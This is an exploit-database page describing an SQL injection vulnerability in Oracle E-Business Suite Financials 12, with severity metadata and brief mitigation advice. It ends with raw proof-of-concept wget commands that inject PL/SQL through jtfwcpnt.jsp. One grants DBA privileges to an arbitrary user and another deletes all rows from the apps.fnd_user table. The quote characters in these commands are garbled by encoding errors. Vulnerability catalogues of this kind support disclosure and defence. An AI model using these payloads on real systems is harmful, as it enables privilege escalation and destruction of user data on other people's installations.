header-logo
Suggest Exploit
vendor:
Oracle E-Business Suite Financials
by:
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Oracle E-Business Suite Financials
Affected Version From: Oracle E-Business Suite 12
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:oracle:e-business_suite:12
Metasploit:
Other Scripts:
Platforms Tested:

SQL Injection in Oracle E-Business Suite Financials

The Oracle E-Business Suite Financials is vulnerable to SQL injection due to inadequate sanitization of user-supplied data before using it in an SQL query. This vulnerability can be exploited by an attacker to compromise the application, gain unauthorized access or modify data, and potentially exploit other vulnerabilities in the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or using prepared statements can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39510/info

Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Oracle E-Business Suite 12 is vulnerable; other versions may be affected. 

$ export TARGET=�http://www.example.com:<port>/OA_HTML�
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;â?
$ wget -O - â??$TARGET/OA.jspâ? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â?